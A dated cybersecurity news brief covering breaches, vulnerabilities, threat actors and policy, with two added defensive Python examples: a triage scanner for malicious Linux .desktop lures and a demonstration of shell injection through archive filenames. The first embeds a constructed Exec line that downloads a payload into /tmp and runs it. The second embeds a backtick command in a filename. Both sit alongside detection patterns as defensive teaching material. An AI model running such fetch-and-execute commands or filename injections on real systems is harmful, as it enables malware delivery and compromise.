Cybersecurity Brief – 2025-08-24
Major Incidents or Breaches
- DaVita, a kidney dialysis provider, confirmed that a ransomware gang breached its network and exfiltrated personal and health information of nearly 2.7 million individuals.
- CPAP Medical Supplies and Services disclosed a data breach impacting 90,000 individuals, stemming from an intrusion in December 2024.
- Hundreds of organisations were targeted in a new Atomic macOS Stealer campaign via malvertising between June and August 2025.
- A clickjacking technique was reported that can trick browser-extension password managers into autofilling credentials and other stored data into an attacker-controlled page.
- Grok AI conversations that users had shared via a link were indexed by Google and became publicly searchable, even though the sharing was understood to be private.
Newly Discovered Vulnerabilities
- Apple patched a zero-day vulnerability (CVE-2025-43300) exploited in sophisticated attacks against targeted individuals.
- A set of flaws, collectively named ReVault, in the ControlVault security hardware found in widely used Dell laptops allowed attackers to gain persistent access at the firmware level, below the operating system.
- AWS fixed a vulnerability that allowed attackers to trick Trusted Advisor into reporting publicly accessible S3 buckets as secure.
- Microsoft confirmed that August 2025 Windows security updates are causing severe issues with NDI streaming software on Windows 10 and 11.
- MITRE released an updated CWE Most Important Hardware Weaknesses list, reflecting current hardware security challenges.
Notable Threat Actor Activity
- The Chinese state-sponsored group Murky Panda (Silk Typhoon) escalated cloud and telecom espionage, exploiting trusted relationships in cloud environments to access downstream customer networks and data, particularly targeting North American organisations. The group leveraged both n-day and zero-day vulnerabilities for initial access.
- Pakistani APT36 is abusing Linux .desktop files to install malware in new campaigns against Indian government and defence entities.
- Campaigns exploiting known vulnerabilities in GeoServer, Redis, and other platforms have been observed, with attackers leveraging these for botnet expansion and malicious activities.
- A new macOS infostealer, Shamos, is being delivered through fake troubleshooting guides and fixes in ClickFix attacks, which persuade the user to paste a terminal command that fetches and runs the malware.
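The APT36 item above names the technique (a .desktop launcher masquerading as a document) but not what a defender should look for. The following is an added example, not code from the brief or from any vendor report: a heuristic triage script that parses a .desktop file and flags the traits such lures tend to combine (a document-like Name and Icon, an Exec that wraps a shell one-liner, downloading or decoding, chmod, staging under /tmp, and hiding from menus). The two entries, the IP address and the heuristics are constructed for illustration.

```python
"""Heuristic triage of Linux .desktop launchers used as phishing lures.

Added example for this brief, not code from the report it summarises or
from any vendor. The two entries below are constructed; field names follow
the freedesktop.org Desktop Entry specification, the heuristics are ours.
"""
import configparser
import re
import sys
from typing import Dict, List

# Constructed lure: presents as a PDF, but Exec runs a shell one-liner that
# fetches a payload into /tmp, runs it, and opens a decoy document.
MALICIOUS_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
NoDisplay=true
Exec=bash -c "mkdir -p /tmp/.x && curl -s http://198.51.100.10/p -o /tmp/.x/p && chmod +x /tmp/.x/p && /tmp/.x/p & xdg-open /tmp/decoy.pdf"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Terminal=false
Exec=gedit %U
"""

DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt|txt)$", re.IGNORECASE)
DOC_ICON = re.compile(r"(application-(pdf|msword|vnd\.)|x-office|libreoffice)", re.IGNORECASE)
SHELL_WRAPPER = re.compile(r"^(/bin/|/usr/bin/)?(ba|z|da)?sh\s+-c\b")
DOWNLOADER = re.compile(r"\b(curl|wget|base64\s+(-d|--decode)|python3?\s+-c)\b")
CHMOD_X = re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")
TMP_PATH = re.compile(r"/(tmp|var/tmp|dev/shm)/\S*")


def parse_desktop(text: str) -> Dict[str, str]:
    """Return the [Desktop Entry] group as a dict (keys stay case-sensitive)."""
    # Only '=' separates key and value in .desktop files; URLs in Exec contain ':'.
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def score_desktop(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    entry = parse_desktop(text)
    name, icon, exec_line = entry.get("Name", ""), entry.get("Icon", ""), entry.get("Exec", "")
    findings = []
    if DOC_EXT.search(name):
        findings.append(f"Name mimics a document: {name!r}")
    if DOC_ICON.search(icon):
        findings.append(f"Icon mimics a document type: {icon!r}")
    uses_shell = bool(SHELL_WRAPPER.match(exec_line))
    if uses_shell:
        findings.append("Exec wraps a shell one-liner (sh/bash -c)")
    if DOWNLOADER.search(exec_line):
        findings.append("Exec downloads or decodes a payload (curl/wget/base64)")
    if CHMOD_X.search(exec_line):
        findings.append("Exec marks a file executable (chmod)")
    if TMP_PATH.search(exec_line):
        findings.append("Exec stages files under a world-writable temp directory")
    hidden = entry.get("Terminal", "").lower() == "false" and entry.get("NoDisplay", "").lower() == "true"
    if uses_shell and hidden:
        findings.append("Hidden launcher (NoDisplay=true, Terminal=false) running a shell")
    return findings


def scan_paths(paths: List[str]) -> Dict[str, List[str]]:
    """Scan .desktop files on disk, e.g. ~/.config/autostart and ~/Downloads."""
    results = {}
    for p in paths:
        with open(p, encoding="utf-8", errors="replace") as fh:
            results[p] = score_desktop(fh.read())
    return results


if __name__ == "__main__":
    targets = sys.argv[1:]
    results = scan_paths(targets) if targets else {
        "constructed-malicious": score_desktop(MALICIOUS_DESKTOP),
        "constructed-benign": score_desktop(BENIGN_DESKTOP),
    }
    for label, hits in results.items():
        print(f"{label}: {'CLEAN' if not hits else ''}")
        for h in hits:
            print(f"  - {h}")
```

Run it with no arguments to score the two constructed entries, or pass paths such as `~/.config/autostart/*.desktop` and `~/Downloads/*.desktop` to triage real files. Each heuristic alone is noisy (plenty of legitimate launchers use `sh -c`); it is the combination of a document-like name and icon with a hidden shell that downloads and runs something from /tmp that marks a lure.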
Trends, Tools, or Tactics of Interest
- Threat actors are increasingly abusing generative AI tools to produce convincing phishing websites rapidly, as observed by Palo Alto Networks’ Unit 42.
- Survey scam phishing emails are evolving in sophistication, using technical measures to evade detection and steal financial data.
- Linux malware campaigns are delivering the open-source VShell backdoor through phishing emails carrying RAR archives whose member filenames embed shell commands, a technique that sidesteps content-based antivirus scanning.
- Automation is increasingly reshaping how penetration tests are delivered, with a shift toward more scalable and efficient reporting.
- The proliferation of AI agents, chatbots, and machine credentials is creating new security management challenges, as these non-human identities now outnumber human users.
- Insurers are considering limiting payouts for breaches involving unpatched critical vulnerabilities, with resistance from most organisations.
- AI-assisted code and security reviews (e.g., Anthropic’s Claude) are being explored to enhance application security.
- A report found that Apple Intelligence collects more user data than previously understood, including music preferences and location, and potentially the contents of encrypted messages.
- Modern vehicle cybersecurity trends highlight growing threats and the need for new security approaches in automotive systems.
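The VShell item above says the payload rides in RAR filenames but not why a filename can execute anything. The following is an added example, not code from the brief or from any vendor report, and it assumes the mechanism: a command substitution embedded in a member name that a helper script later expands unquoted. It contrasts that anti-pattern with two safe forms and includes the listing check a mail gateway or sandbox could apply. The filenames are constructed and the embedded command is a harmless `echo INJECTED`.

```python
"""Shell-command injection through archive member names.

Added example for this brief, not code from the report it summarises. The
member names are constructed and the embedded command is a harmless
`echo INJECTED`; the point is that a filename is data, not part of a command.
"""
import re
import shlex
import subprocess
from typing import List

BENIGN_NAME = "quarterly_report.pdf"
# A backtick command substitution hidden in the name. Any helper script that
# does `for f in *; do tool $f; done` hands this to the shell unquoted.
MALICIOUS_NAME = "quarterly_report.pdf`echo INJECTED`"

# Characters that let a filename break out of a single word when a shell
# expands it: substitution, separators, redirection, newlines, variables.
SHELL_META = re.compile(r"[`;|&<>\n\r]|\$\(|\$\{|\$[A-Za-z_]")


def flag_unsafe_names(names: List[str]) -> List[str]:
    """Names from an archive listing that contain shell metacharacters."""
    return [n for n in names if SHELL_META.search(n)]


def _sh(cmd: str, *args: str) -> str:
    """Run a command line under POSIX sh; extra args become $1, $2, ..."""
    out = subprocess.run(["sh", "-c", cmd, "sh", *args], capture_output=True, text=True)
    return out.stdout.strip()


def run_vulnerable(name: str) -> str:
    """Anti-pattern: the name is pasted into the command string, so the shell
    evaluates the backticks before printf ever sees the argument."""
    return _sh("printf '%s\\n' " + name)


def run_hardened(name: str) -> str:
    """Pass the name as a positional parameter and expand it quoted ("$1");
    the shell treats it as one literal word."""
    return _sh("printf '%s\\n' \"$1\"", name)


def run_hardened_quoted(name: str) -> str:
    """If the name must be spliced into a command string, shlex.quote turns it
    into a single-quoted literal first."""
    return _sh("printf '%s\\n' " + shlex.quote(name))


if __name__ == "__main__":
    print("flagged:", flag_unsafe_names([BENIGN_NAME, MALICIOUS_NAME]))
    print("vulnerable:", run_vulnerable(MALICIOUS_NAME))
    print("hardened ($1):", run_hardened(MALICIOUS_NAME))
    print("hardened (shlex.quote):", run_hardened_quoted(MALICIOUS_NAME))
```

The vulnerable path prints `quarterly_report.pdfINJECTED`: the substitution ran and its output was glued onto the name. Both hardened paths print the name verbatim. The same rule applies to any script that loops over extracted files (`find -exec`, `xargs -0`, or `"$f"` in a `for` loop); the listing check is a cheap second layer for mail gateways, since scanners that only inspect file contents never look at the member names.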
Regulatory or Policy Developments
- INTERPOL’s Operation Serengeti 2.0 resulted in the arrest of over 1,200 cybercriminals across 18 African nations, dismantling criminal infrastructure and recovering nearly $100 million.
- CISA released a draft Software Bill of Materials (SBOM) guide for public comment.
- Ongoing concerns about personal liability for CISOs remain, with increased risk of both legal and criminal targeting.
- Microsoft has limited China’s access to the Microsoft Active Protections Program (MAPP).